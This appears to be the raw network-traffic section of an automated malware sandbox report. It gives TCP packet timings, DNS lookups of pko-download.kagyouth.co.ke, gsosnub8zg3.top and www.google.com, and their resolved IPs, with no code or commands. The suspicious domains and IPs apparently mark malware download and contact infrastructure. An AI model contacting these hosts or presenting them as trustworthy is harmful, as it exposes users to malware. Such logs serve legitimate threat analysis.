                                                                                                                              Dec 17, 2024 16:32:09.300554991 CET4434971445.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:09.300647020 CET49714443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:09.318411112 CET4434971445.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:09.318500996 CET49714443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:09.329150915 CET4434971445.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:09.329246044 CET49714443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:09.338567972 CET4434971445.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:09.338666916 CET49714443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:09.347908974 CET4434971445.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:09.347995996 CET49714443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:09.353601933 CET4434971545.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:09.353719950 CET49715443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:09.372348070 CET4434971545.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:09.372462988 CET49715443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:09.390264034 CET4434971445.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:09.390371084 CET49714443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:09.397156954 CET4434971545.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:09.397273064 CET49715443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:09.457964897 CET4434971545.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:09.458122969 CET49715443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:09.463186026 CET4434971445.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:09.463294029 CET49714443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:09.470396996 CET4434971445.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:09.470499039 CET49714443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:09.477770090 CET4434971445.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:09.477859974 CET49714443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:09.487080097 CET4434971445.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:09.487174034 CET49714443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:09.494263887 CET4434971445.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:09.494338036 CET49714443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:09.501449108 CET4434971445.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:09.501528025 CET49714443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:09.510879993 CET4434971445.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:09.510962009 CET49714443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:09.512698889 CET4434971445.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:09.512772083 CET49714443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:09.512805939 CET4434971445.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:09.512840033 CET4434971445.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:09.512868881 CET49714443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:09.512898922 CET49714443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:09.512938023 CET49714443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:09.512969971 CET4434971445.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:09.513008118 CET49714443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:09.513030052 CET49714443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:09.548793077 CET4434971545.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:09.548897982 CET49715443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:09.560720921 CET4434971545.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:09.560811043 CET49715443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:10.047904015 CET4434971545.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:10.047924995 CET4434971545.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:10.047997952 CET49715443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:10.063512087 CET4434971545.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:10.063606977 CET49715443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:10.076304913 CET4434971545.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:10.076394081 CET49715443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:10.087532043 CET4434971545.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:10.087601900 CET49715443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:10.103497028 CET4434971545.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:10.103574991 CET49715443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:10.115082026 CET4434971545.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:10.115202904 CET49715443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:10.128269911 CET4434971545.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:10.128365993 CET49715443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:10.141191006 CET4434971545.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:10.141261101 CET49715443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:10.297354937 CET4434971545.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:10.297471046 CET49715443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:10.496213913 CET4434971545.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:10.496304035 CET49715443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:10.506001949 CET4434971545.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:10.506103039 CET49715443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:10.515351057 CET4434971545.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:10.515526056 CET49715443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:10.697635889 CET4434971545.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:10.698225975 CET49715443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:10.704791069 CET4434971545.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:10.704921007 CET49715443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:10.713671923 CET4434971545.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:10.713771105 CET49715443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:10.725644112 CET4434971545.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:10.725800991 CET49715443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:10.735687017 CET4434971545.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:10.735797882 CET49715443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:10.744954109 CET4434971545.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:10.745105028 CET49715443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:10.930499077 CET4434971545.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:10.930603981 CET49715443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:10.933301926 CET4434971545.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:10.933361053 CET49715443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:10.933370113 CET4434971545.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:10.933383942 CET4434971545.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:10.933470964 CET49715443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:10.933470964 CET49715443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:10.933947086 CET49715443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:10.933947086 CET49715443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:10.933974981 CET4434971545.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:10.934024096 CET49715443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:13.978851080 CET4973280192.168.2.6193.149.129.61
                                                                                                                              Dec 17, 2024 16:32:13.979507923 CET4973380192.168.2.6193.149.129.61
                                                                                                                              Dec 17, 2024 16:32:14.098853111 CET8049732193.149.129.61192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:14.099272013 CET4973280192.168.2.6193.149.129.61
                                                                                                                              Dec 17, 2024 16:32:14.099361897 CET8049733193.149.129.61192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:14.101399899 CET4973380192.168.2.6193.149.129.61
                                                                                                                              Dec 17, 2024 16:32:14.101443052 CET4973280192.168.2.6193.149.129.61
                                                                                                                              Dec 17, 2024 16:32:14.102019072 CET4973380192.168.2.6193.149.129.61
                                                                                                                              Dec 17, 2024 16:32:14.221040010 CET8049732193.149.129.61192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:14.221534014 CET8049733193.149.129.61192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:15.718879938 CET8049732193.149.129.61192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:15.720865011 CET8049733193.149.129.61192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:15.764123917 CET4973380192.168.2.6193.149.129.61
                                                                                                                              Dec 17, 2024 16:32:15.860488892 CET4974180192.168.2.6172.217.19.228
                                                                                                                              Dec 17, 2024 16:32:15.860743999 CET4974080192.168.2.6172.217.19.228
                                                                                                                              Dec 17, 2024 16:32:15.873502970 CET4973280192.168.2.6193.149.129.61
                                                                                                                              Dec 17, 2024 16:32:15.980298042 CET8049741172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:15.980374098 CET8049740172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:15.980407953 CET4974180192.168.2.6172.217.19.228
                                                                                                                              Dec 17, 2024 16:32:15.980462074 CET4974080192.168.2.6172.217.19.228
                                                                                                                              Dec 17, 2024 16:32:15.980617046 CET4974180192.168.2.6172.217.19.228
                                                                                                                              Dec 17, 2024 16:32:15.980797052 CET4974080192.168.2.6172.217.19.228
                                                                                                                              Dec 17, 2024 16:32:16.100367069 CET8049741172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:16.100404024 CET8049740172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:17.988176107 CET8049740172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:17.988254070 CET8049740172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:17.988269091 CET8049740172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:17.988311052 CET4974080192.168.2.6172.217.19.228
                                                                                                                              Dec 17, 2024 16:32:17.988476038 CET8049740172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:17.988518000 CET4974080192.168.2.6172.217.19.228
                                                                                                                              Dec 17, 2024 16:32:17.988523006 CET8049740172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:17.988538980 CET8049740172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:17.988552094 CET8049740172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:17.988567114 CET8049740172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:17.988576889 CET4974080192.168.2.6172.217.19.228
                                                                                                                              Dec 17, 2024 16:32:17.988605976 CET4974080192.168.2.6172.217.19.228
                                                                                                                              Dec 17, 2024 16:32:17.989044905 CET8049740172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:17.989062071 CET8049740172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:17.989115953 CET4974080192.168.2.6172.217.19.228
                                                                                                                              Dec 17, 2024 16:32:18.069437981 CET8049741172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:18.069524050 CET8049741172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:18.069536924 CET8049741172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:18.069570065 CET4974180192.168.2.6172.217.19.228
                                                                                                                              Dec 17, 2024 16:32:18.069722891 CET8049741172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:18.069737911 CET8049741172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:18.069787025 CET4974180192.168.2.6172.217.19.228
                                                                                                                              Dec 17, 2024 16:32:18.069868088 CET8049741172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:18.069900036 CET4974180192.168.2.6172.217.19.228
                                                                                                                              Dec 17, 2024 16:32:18.069905996 CET8049741172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:18.070044994 CET8049741172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:18.070076942 CET4974180192.168.2.6172.217.19.228
                                                                                                                              Dec 17, 2024 16:32:18.070209026 CET8049741172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:18.070373058 CET8049741172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:18.070401907 CET4974180192.168.2.6172.217.19.228
                                                                                                                              Dec 17, 2024 16:32:18.107996941 CET8049740172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:18.108067989 CET8049740172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:18.108195066 CET4974080192.168.2.6172.217.19.228
                                                                                                                              Dec 17, 2024 16:32:18.112345934 CET8049740172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:18.154791117 CET4974080192.168.2.6172.217.19.228
                                                                                                                              Dec 17, 2024 16:32:18.188451052 CET8049740172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:18.188656092 CET8049740172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:18.188707113 CET4974080192.168.2.6172.217.19.228
                                                                                                                              Dec 17, 2024 16:32:18.190164089 CET8049741172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:18.190299034 CET8049741172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:18.190350056 CET4974180192.168.2.6172.217.19.228
                                                                                                                              Dec 17, 2024 16:32:18.193679094 CET8049740172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:18.194861889 CET8049740172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:18.194904089 CET4974080192.168.2.6172.217.19.228
                                                                                                                              Dec 17, 2024 16:32:18.195272923 CET8049740172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:18.195331097 CET8049741172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:18.195450068 CET8049741172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:18.195488930 CET4974180192.168.2.6172.217.19.228
                                                                                                                              Dec 17, 2024 16:32:18.204443932 CET8049740172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:18.204488039 CET4974080192.168.2.6172.217.19.228
                                                                                                                              Dec 17, 2024 16:32:18.206224918 CET8049740172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:18.206249952 CET8049740172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:18.206383944 CET4974080192.168.2.6172.217.19.228
                                                                                                                              Dec 17, 2024 16:32:18.215321064 CET8049740172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:18.216295958 CET8049740172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:18.216353893 CET4974080192.168.2.6172.217.19.228
                                                                                                                              Dec 17, 2024 16:32:18.216451883 CET8049740172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:18.224684954 CET8049740172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:18.224752903 CET4974080192.168.2.6172.217.19.228
                                                                                                                              Dec 17, 2024 16:32:18.227610111 CET8049740172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:18.279812098 CET4974080192.168.2.6172.217.19.228
                                                                                                                              Dec 17, 2024 16:32:18.410284042 CET8049740172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:18.410317898 CET8049740172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:18.410335064 CET8049740172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:18.410348892 CET8049740172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:18.410363913 CET8049740172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:18.410377979 CET8049740172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:18.410393000 CET8049740172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:18.410407066 CET8049740172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:18.410423040 CET8049741172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:18.410437107 CET8049741172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:18.410450935 CET8049741172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:18.410465002 CET8049741172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:18.410479069 CET8049741172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:18.410492897 CET8049740172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:18.410499096 CET4974080192.168.2.6172.217.19.228
                                                                                                                              Dec 17, 2024 16:32:18.410506964 CET8049740172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:18.410521030 CET8049741172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:18.410536051 CET8049741172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:18.410548925 CET8049741172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:18.410567999 CET8049741172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:18.410567999 CET4974180192.168.2.6172.217.19.228
                                                                                                                              Dec 17, 2024 16:32:18.410578012 CET4974080192.168.2.6172.217.19.228
                                                                                                                              Dec 17, 2024 16:32:18.410609961 CET4974180192.168.2.6172.217.19.228
                                                                                                                              Dec 17, 2024 16:32:18.410618067 CET8049741172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:18.410618067 CET4974080192.168.2.6172.217.19.228
                                                                                                                              Dec 17, 2024 16:32:18.410633087 CET8049741172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:18.410646915 CET8049741172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:18.410664082 CET8049740172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:18.410677910 CET8049740172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:18.410693884 CET8049740172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:18.410701036 CET4974180192.168.2.6172.217.19.228
                                                                                                                              Dec 17, 2024 16:32:18.410708904 CET8049740172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:18.410722971 CET8049741172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:18.410725117 CET4974180192.168.2.6172.217.19.228
                                                                                                                              Dec 17, 2024 16:32:18.410737038 CET8049741172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:18.410747051 CET4974080192.168.2.6172.217.19.228
                                                                                                                              Dec 17, 2024 16:32:18.410753012 CET8049741172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:18.410767078 CET8049740172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:18.410779953 CET8049741172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:18.410780907 CET4974080192.168.2.6172.217.19.228
                                                                                                                              Dec 17, 2024 16:32:18.410794973 CET8049741172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:18.410801888 CET4974180192.168.2.6172.217.19.228
                                                                                                                              Dec 17, 2024 16:32:18.410809040 CET8049741172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:18.410829067 CET4974180192.168.2.6172.217.19.228
                                                                                                                              Dec 17, 2024 16:32:18.410855055 CET4974180192.168.2.6172.217.19.228
                                                                                                                              Dec 17, 2024 16:32:18.410897017 CET8049741172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:18.410912037 CET8049741172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:18.410927057 CET8049741172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:18.410939932 CET8049741172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:18.410953045 CET8049741172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:18.410967112 CET8049741172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:18.410979986 CET4974180192.168.2.6172.217.19.228
                                                                                                                              Dec 17, 2024 16:32:18.411015034 CET4974180192.168.2.6172.217.19.228
                                                                                                                              Dec 17, 2024 16:32:18.414808035 CET8049740172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:18.414911985 CET4974080192.168.2.6172.217.19.228
                                                                                                                              Dec 17, 2024 16:32:18.417208910 CET8049740172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:18.424153090 CET8049740172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:18.424173117 CET8049740172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:18.424253941 CET4974080192.168.2.6172.217.19.228
                                                                                                                              Dec 17, 2024 16:32:18.428862095 CET8049740172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:18.428962946 CET4974080192.168.2.6172.217.19.228
                                                                                                                              Dec 17, 2024 16:32:18.433840036 CET8049740172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:18.433859110 CET8049740172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:18.433944941 CET4974080192.168.2.6172.217.19.228
                                                                                                                              Dec 17, 2024 16:32:18.437268972 CET8049740172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:18.438786030 CET8049740172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:18.438853979 CET4974080192.168.2.6172.217.19.228
                                                                                                                              Dec 17, 2024 16:32:18.450741053 CET8049740172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:18.451179981 CET8049740172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:18.451273918 CET4974080192.168.2.6172.217.19.228
                                                                                                                              Dec 17, 2024 16:32:18.454885960 CET8049740172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:18.476284027 CET8049740172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:18.476416111 CET4974080192.168.2.6172.217.19.228
                                                                                                                              Dec 17, 2024 16:32:18.476480007 CET8049740172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:18.480545998 CET8049740172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:18.480635881 CET4974080192.168.2.6172.217.19.228
                                                                                                                              Dec 17, 2024 16:32:18.497781992 CET8049740172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:18.498131990 CET8049740172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:18.498213053 CET4974080192.168.2.6172.217.19.228
                                                                                                                              Dec 17, 2024 16:32:18.532190084 CET8049741172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:18.532265902 CET8049741172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:18.532377005 CET4974180192.168.2.6172.217.19.228
                                                                                                                              Dec 17, 2024 16:32:18.535835981 CET8049741172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:18.535876989 CET8049741172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:18.535921097 CET4974180192.168.2.6172.217.19.228
                                                                                                                              Dec 17, 2024 16:32:18.542881012 CET8049741172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:18.543370962 CET8049741172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:18.543421984 CET4974180192.168.2.6172.217.19.228
                                                                                                                              Dec 17, 2024 16:32:18.550045967 CET8049741172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:18.550384998 CET8049741172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:18.550431967 CET4974180192.168.2.6172.217.19.228
                                                                                                                              Dec 17, 2024 16:32:18.556457996 CET8049741172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:18.556516886 CET8049741172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:18.556565046 CET4974180192.168.2.6172.217.19.228
                                                                                                                              Dec 17, 2024 16:32:18.563308954 CET8049741172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:18.563478947 CET8049741172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:18.563536882 CET4974180192.168.2.6172.217.19.228
                                                                                                                              Dec 17, 2024 16:32:18.568998098 CET8049741172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:18.569247961 CET8049741172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:18.569293976 CET4974180192.168.2.6172.217.19.228
                                                                                                                              Dec 17, 2024 16:32:18.575285912 CET8049741172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:18.575447083 CET8049741172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:18.575496912 CET4974180192.168.2.6172.217.19.228
                                                                                                                              Dec 17, 2024 16:32:18.582123041 CET8049741172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:18.583085060 CET8049741172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:18.583261967 CET4974180192.168.2.6172.217.19.228
                                                                                                                              Dec 17, 2024 16:32:18.732656002 CET4974080192.168.2.6172.217.19.228
                                                                                                                              Dec 17, 2024 16:32:18.732815027 CET4973280192.168.2.6193.149.129.61
                                                                                                                              Dec 17, 2024 16:32:18.792944908 CET4974180192.168.2.6172.217.19.228
                                                                                                                              Dec 17, 2024 16:32:18.793131113 CET4973380192.168.2.6193.149.129.61
                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                              Dec 17, 2024 16:32:00.117710114 CET6101653192.168.2.61.1.1.1
                                                                                                                              Dec 17, 2024 16:32:00.556895018 CET53610161.1.1.1192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:13.690642118 CET6140953192.168.2.61.1.1.1
                                                                                                                              Dec 17, 2024 16:32:13.934084892 CET53614091.1.1.1192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:15.720129013 CET5043553192.168.2.61.1.1.1
                                                                                                                              Dec 17, 2024 16:32:15.857433081 CET53504351.1.1.1192.168.2.6
                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                              Dec 17, 2024 16:32:00.117710114 CET192.168.2.61.1.1.10x4479Standard query (0)pko-download.kagyouth.co.keA (IP address)IN (0x0001)false
                                                                                                                              Dec 17, 2024 16:32:13.690642118 CET192.168.2.61.1.1.10xcadaStandard query (0)gsosnub8zg3.topA (IP address)IN (0x0001)false
                                                                                                                              Dec 17, 2024 16:32:15.720129013 CET192.168.2.61.1.1.10x91f2Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                              Dec 17, 2024 16:32:00.556895018 CET1.1.1.1192.168.2.60x4479No error (0)pko-download.kagyouth.co.ke45.11.180.77A (IP address)IN (0x0001)false
                                                                                                                              Dec 17, 2024 16:32:13.934084892 CET1.1.1.1192.168.2.60xcadaNo error (0)gsosnub8zg3.top193.149.129.61A (IP address)IN (0x0001)false
                                                                                                                              Dec 17, 2024 16:32:15.857433081 CET1.1.1.1192.168.2.60x91f2No error (0)www.google.com172.217.19.228A (IP address)IN (0x0001)false
                                                                                                                              • pko-download.kagyouth.co.ke
                                                                                                                              • gsosnub8zg3.top
                                                                                                                              • www.google.com
                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
